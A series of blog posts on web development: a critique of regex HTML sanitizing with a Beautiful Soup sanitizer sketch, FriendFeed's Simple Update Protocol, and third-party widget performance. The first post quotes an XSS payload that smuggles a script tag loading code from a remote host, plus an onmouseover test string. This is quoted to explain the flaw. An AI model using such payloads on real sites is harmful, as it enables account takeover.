The problem Jeff was trying to solve is how to allow a subset of HTML tags while stripping out all other HTML so as to prevent cross site scripting (XSS) attacks. The flaw in Jeff's approach, which was pointed out in the comments by many people including Simon Willison, is that filtering HTML input with regexes in this way assumes you will get fairly well-formed HTML. As many developers have found out the hard way, you also have to worry about malformed HTML due to the liberal HTML parsing policies of modern Web browsers. To use this approach safely you would have to reverse engineer every HTML parsing quirk of common browsers if you don't want to end up storing HTML that looks safe but actually contains an exploit. Instead of regular expressions, Jeff really should have been looking at using a full-fledged HTML parser such as SgmlReader or Beautiful Soup.
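
To make the parser-based alternative concrete, here is a rough sketch of a whitelist sanitizer built on Beautiful Soup (the bs4 package is the modern incarnation of the library). The allowed tag and attribute sets are illustrative rather than a vetted security policy, and a production sanitizer would also need to validate attribute values such as javascript: URLs in href and src.

from bs4 import BeautifulSoup

ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "s", "strike", "blockquote",
                "sub", "sup", "h1", "h2", "h3", "pre", "hr", "code", "ul", "ol",
                "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}

def sanitize_html(dirty):
    soup = BeautifulSoup(dirty, "html.parser")
    for tag in soup(["script", "style"]):
        tag.decompose()                      # remove scripts and styles wholesale
    for tag in soup.find_all(True):          # walk every element, however malformed
        if tag.name not in ALLOWED_TAGS:
            tag.unwrap()                     # drop the tag but keep its inner text
            continue
        allowed = ALLOWED_ATTRS.get(tag.name, set())
        for attr in list(tag.attrs):
            if attr not in allowed:
                del tag[attr]                # strip onclick, onmouseover, style, ...
    return str(soup)

print(sanitize_html('<b onmouseover=alert(1)>hi</b><script>alert(2)</script>'))
# -> <b>hi</b>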

It didn't take long for the users of StackOverflow.com to show Jeff the error of his ways, as evidenced by his post Protecting Your Cookies: HttpOnly, where he acknowledges his mistake as follows:

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. 

The sad thing is that Jeff Atwood isn't the first nor will he be the last programmer to think to himself "It's just HTML sanitization, how hard can it be?". There are many lists of Top HTML Validation Bloopers that show how tricky it is to get the right solution to this seemingly trivial problem. Additionally, it is sad to note that despite his recent experience, Jeff Atwood still argues that he'd rather make his own mistakes than blindly inherit the mistakes of others as justification for continuing to reinvent the wheel in the future. That is unfortunate, given that it is a bad attitude for a professional software developer to have.

Rolling your own solution to a common problem should be the last option on your list, not the first. Otherwise, you might just end up a candidate for The Daily WTF and deservedly so.

Now Playing: T-Pain - Cant Believe It (feat. Lil Wayne)


 

Categories: Programming

Paul Buchheit of FriendFeed has written up a proposal for a new protocol that Web sites can implement to reduce the load on their services from social network aggregators like FriendFeed and SocialThing. He unveils his proposal in his post Simple Update Protocol: Fetch updates from feeds faster, which is excerpted below:

When you add a web site like Flickr or Google Reader to FriendFeed, FriendFeed's servers constantly download your feed from the service to get your updates as quickly as possible. FriendFeed's user base has grown quite a bit since launch, and our servers now download millions of feeds from over 43 services every hour.

One of the limitations of this approach is that it is difficult to get updates from services quickly without FriendFeed's crawler overloading other sites' servers with update checks. Gary Burd and I have thought quite a bit about ways we could augment existing feed formats like Atom and RSS to make fetching updates faster and more efficient. Our proposal, which we have named Simple Update Protocol, or SUP, is below.
...
Sites wishing to produce a SUP feed must do two things:

  • Add a special <link> tag to their SUP enabled Atom or RSS feeds. This <link> tag includes the feed's SUP-ID and the URL of the appropriate SUP feed.
  • Generate a SUP feed which lists the SUP-IDs of all recently updated feeds.

Feed consumers can add SUP support by:

  • Storing the SUP-IDs of the Atom/RSS feeds they consume.
  • Watching for those SUP-IDs in their associated SUP feeds.

By using SUP-IDs instead of feed urls, we avoid having to expose the feed url, avoid URL canonicalization issues, and produce a more compact update feed (because SUP-IDs can be a database id or some other short token assigned by the service). Because it is still possible to miss updates due to server errors or other malfunctions, SUP does not completely eliminate the need for polling.

Although there's a healthy conversation about SUP going on in FriendFeed in response to one of my tweets, I thought it would be worth sharing some thoughts on this with a broader audience.

The problem statement that FriendFeed's SUP addresses is the following issue raised in my previous post When REST Doesn't Scale, XMPP to the Rescue?

On July 21st, FriendFeed had 45,000 users who had associated their Flickr profiles with their FriendFeed account. FriendFeed polls Flickr about once every 20 – 30 minutes to see if the user has uploaded new pictures. However only about 6,000 of those users logged into Flickr that day, let alone uploaded pictures. Thus there were literally millions of HTTP requests made by FriendFeed that were totally unnecessary.

FriendFeed's proposal is similar to the Six Apart Update Stream and the Twitter XMPP Firehose in that it is a data stream containing information about all of the updates users are making on a particular service. It differs in a key way: it doesn't actually contain the data from the user updates, but instead identifiers which can be used to determine which users changed so that their feeds can be polled.

This approach aims at protecting feeds that use security through obscurity, such as Google Reader's Shared Items feed and Netflix's Personalized Feeds. The user shares their "secret" feed URL with FriendFeed, which then obtains the SUP-ID of the user's feed when the feed is first polled. Then whenever that SUP-ID is seen in the SUP feed by FriendFeed, it knows to go re-poll the user's "secret" feed URL.
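
Sketched out, the consuming side keeps a map from SUP-ID to the (possibly secret) feed URL it learned the ID from, polls the aggregate SUP feed, and re-fetches only the feeds whose SUP-IDs appear in it. Note that the JSON shape below ("updates" as a list of [SUP-ID, token] pairs) is my assumption based on the proposal's description, not a quote from the spec.

import json
from urllib.request import urlopen

SUP_FEED_URL = "https://example.com/api/sup.json"    # placeholder

# learned when each feed was first polled: SUP-ID -> feed URL (possibly "secret")
sup_id_to_feed = {
    "3f0a9c": "https://example.com/reader/shared/SECRETTOKEN/atom",
    "77b21d": "https://example.com/user/12345/rss",
}

def feeds_needing_repoll():
    with urlopen(SUP_FEED_URL) as resp:
        sup_doc = json.load(resp)
    # assumed shape: {"updates": [["3f0a9c", "token"], ...], ...}
    updated_ids = {entry[0] for entry in sup_doc.get("updates", [])}
    return [url for sup_id, url in sup_id_to_feed.items() if sup_id in updated_ids]

# Only the URLs returned here get re-fetched right away; everything else stays
# on its normal, much slower polling schedule as a safety net for missed updates.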

For services that are getting a ton of traffic from social network aggregators or Web-based feed readers, it does make sense to provide some sort of update stream or fire hose to reduce the amount of polling that gets done. In addition, if more and more services are going to provide such update streams, it makes sense to standardize the format so that social network aggregators and similar services do not end up having to target multiple update protocols.

I believe that in the end we will see a continuum of options in this space. The vast majority of services will be OK with the load generated by social networking aggregators and Web-based feed readers when polling their feeds. These services won't see the point of building additional features to handle this load. Some services will run the numbers like Twitter & Six Apart have done and will provide update streams in an attempt to reduce the impact of polling. For these services, SUP seems like a somewhat elegant solution, and it would be good to standardize on something; anything at all is better than each site having its own custom solution. For a smaller set of services, this still won't be enough since they don't provide feeds (e.g. Blockbuster's use of Facebook Beacon) and you'll need an explicit server to server publish-subscribe mechanism. XMPP, or perhaps an HTTP-based publish-subscribe mechanism like the one Joshua Schachter proposed a few weeks ago, will be the best fit for those scenarios.

Now Playing: Jodeci - I'm Still Waiting


 

Categories: Web Development

I've been reading about the Ning vs. WidgetLaboratory drama on TechCrunch. The meat of the conflict seems to be that widgets from WidgetLaboratory were so degrading the user experience of Ning that they had to be cut off. The relevant excerpts from the most recent TechCrunch story on the war of words are below

For those of you not closely following the drama between social network platform Ning and a popular widget provider called WidgetLaboratory, you can read the background here. On Friday Ning unceremoniously shut down their access to Ning, making all those widgets vanish.
...
In an email to WL on August 2 (more than three weeks ago), CEO Gina Bianchini wrote “Our only goal is to have you build your products in such a way that doesn’t slow down the networks running your products or takedown the Ning Platform with what you’re doing. Both of those would result in us needing to shutdown WidgetLaboratory products and that’s has never been our first choice of options. Hopefully, you know this after 8 months of working with us.”

Ignoring the he-said, she-said nature of the communication between the two companies, there is a legitimate concern that 3rd party widgets included on the pages of a Web site can degrade performance to the extent that the site becomes unusably slow. In fact, TechCrunch has had similar problems with 3rd party widgets, as Mike Arrington has mentioned on his personal blog, which led to him excluding the widgets from his site.

Typically, widgets are embedded in a site by including references to JavaScript hosted on a 3rd party site in the page's HTML. This means rendering the page is dependent on how quickly the script files can be downloaded from the 3rd party site AND how long it takes for the script to execute, especially since it may also fetch data from one or more servers as well. Thus a slow server or a badly written script can make every page that embeds the widget unbearably slow to render. Given that the ability to embed widgets is a key feature of social networking sites, it is important for such sites to figure out how to isolate their user experience from badly written widgets or widgets hosted on slow Web servers.

Below are some best practices that have emerged on how social networking sites can immunize themselves from the kinds of problems Ning has had with WidgetLaboratory:

  1. Host the Scripts Yourself: If you have a popular site, it is quite likely that you have more resources to handle lots of page views than the typical widget developer. Thus it makes sense to take away the dependency on externally hosted scripts by hosting the widgets yourself. Microsoft encourages developers to submit their gadgets to Windows Live Gallery if they want to build gadgets for my.live.com or Windows Live Spaces. For its AJAX homepage service, Google does not require developers to submit gadgets to them for hosting but instead caches gadget data for hours at a time, which means they are effectively hosting the gadgets themselves for the majority of the accesses by their users. (A sketch of this fetch-and-cache approach appears after this list.)

  2. Keep External Dependencies off of Pages that Need to Render Quickly: In many cases, it isn't feasible to host all of the data and content related to widgets that are being shown on your site. In that case, you should ensure that the key scenarios on your Web site are insulated from the problems caused by slow or broken 3rd party widgets. For example, on Facebook, viewing someone's profile is a key part of the user experience, and it is important to make sure it happens as quickly and as smoothly as possible. For this reason, Facebook caches all 3rd party content that shows up on a user's profile and requires applications to call Profile.SetFBML to add content to the profile instead of providing a way to directly embed widgets on a user's profile.

  3. Make It Clear Who Is to Blame if Things go Awry: One of the issues raised by Ning in their conflict with WidgetLaboratory is that user pages wouldn't render correctly or would show degraded performance due to WidgetLaboratory's widgets, but Ning would get the support calls. This kind of user confusion is avoided if the user experience makes it clear when the failure of a page to render correctly is the fault of the external widget and when it is the fault of the hosting site. For example, Facebook Canvas Pages for applications make it clear that the user is using a 3rd party application that is not part of the core Facebook experience. I've seen lots of users complain about the slowness of Scrabulous and Scrabble but never seen anyone who thought that Facebook was to blame rather than the application developers.
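
As a rough illustration of practice #1, the sketch below fetches a widget developer's script on your own schedule and serves the cached copy from your servers, so a slow or unreachable third-party host never blocks your page loads. The URLs, cache window and fallback behavior are all illustrative.

import time
from urllib.request import urlopen

CACHE_TTL_SECONDS = 4 * 60 * 60     # refresh cached widget scripts every 4 hours
_cache = {}                         # script_url -> (fetched_at, script_bytes)

def cached_widget_script(script_url):
    fetched_at, body = _cache.get(script_url, (0.0, b""))
    if time.time() - fetched_at > CACHE_TTL_SECONDS:
        try:
            with urlopen(script_url, timeout=5) as resp:
                body = resp.read()
            _cache[script_url] = (time.time(), body)
        except OSError:
            pass                    # widget host is slow or down: keep serving the stale copy
    return body                     # serve this from *your* domain, not the widget host's

# e.g. your page template references /widgets/cached.js?src=... on your own
# servers, and that handler calls cached_widget_script(src) to get the bytes.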

Following some of these practices would have saved Ning and its users some of their current grief.

Now Playing: Ice Cube - Get Money, Spend Money, No Money


 

Categories: Platforms | Social Software